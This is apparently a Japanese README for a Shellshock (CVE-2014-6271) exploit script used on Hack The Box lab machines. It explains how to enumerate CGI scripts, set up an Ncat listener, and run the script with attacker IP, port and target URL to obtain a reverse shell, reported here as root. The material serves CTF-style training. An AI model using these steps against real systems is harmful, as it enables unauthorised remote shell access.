
Shellshockエクスプロイト(別名CVE-2014-6271)
Shellshockエクスプロイト、別名CVE-2014-6271。
Bash 3.2およびBash 4.2でテスト済み。
脆弱性の詳細については、以下を参照してください: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
エクスプロイトは主にHack The Boxの以下のボックスでテストされました:
Beepボックス:https://app.hackthebox.eu/machines/BeepShockerボックス:https://app.hackthebox.eu/machines/Shockerそれ以外で/cgi-bin/ディレクトリで403が返される場合は、適切なワードリストを使用してそのディレクトリ内のファイルを列挙し、.shまたは.cgi拡張子を探してみてください。
注意:TCPリスナーを設定することを忘れないでください。そうしないと、testRevShell呼び出しチェック中にエクスプロイトが誤検知を出す可能性があります。
まず、エクスプロイトが受け取る引数を確認するには、次のコマンドを実行します:shellshock.py -h
次に、任意のポートでNcatリスナーをセットアップします。ここでは45を選択しました。
次に、必要なすべての引数を指定してエクスプロイトを実行します:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
ご覧のとおり、ターゲットURLは、そのボックスでの認証中にWebサーバーがPOSTリクエストを送信する場所です。
出力でわかるように、エクスプロイトはSSL上で複数のTLSバージョンを使用してペイロードを送信し、成功するまで試行しています。
そして、リバースシェルを取得しました! 幸運なことに、Webサーバーはrootで実行されていました。